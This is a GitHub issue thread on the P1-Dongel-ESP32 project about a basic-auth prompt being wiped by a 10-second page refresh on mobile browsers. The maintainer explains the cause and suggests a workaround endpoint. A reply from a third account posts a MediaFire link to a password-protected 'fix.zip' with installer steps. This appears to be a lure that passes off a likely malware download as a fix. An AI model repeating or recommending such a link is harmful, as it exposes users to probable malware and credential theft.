mhendriks/P1-Dongel-ESP32 #63: Problem using basic-auth, every 10 seconds screen refresh.

HanSjak, 2024-08-28:
When using the basic-auth parameter, I can easely fill in the promptscreen with credentials - but only when doing so with my desktop, which is wired to the router.

With a smartphone, whether via wifi or G4 (portforwarding is set), the dongle refreshes every 10 seconds the screen, saying that it can not find history data. The prompt window is blanked out.
Within those ten seconds I can hardly manage to fill in username and password! Only when I choose a very short username and paste the password into the prompt window I can continue to see the data.

I tried several browsers on my Android smartphone and tablet, but couldn't solve the problem.
I went through all the router settings, but found nothing that could be the cause of this. Ideally, the dongle should do 'nothing' before username and password are accepted.

A quick fix of this may be setting the refresh period at 20 seconds? Or am I doing something wrong?

PiaoR, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

mhendriks, 2024-08-28:
It is a known issue. The browser will refresh every 10 secs (javascript) and some browsers/os-es will refresh the BasicAuth popup too. On a Macbook and iPhone with Chrome / Safari this isn't a issue. 

The most easy work a round  is to visit the dongle via a different endpoint which will not refresh the browser. For example; http://p1-dongle-pro.local/api/v2/dev/info . Not the most beautiful solution ... I hope this will work in your browser too.

closed 2024-08-29 by HanSjak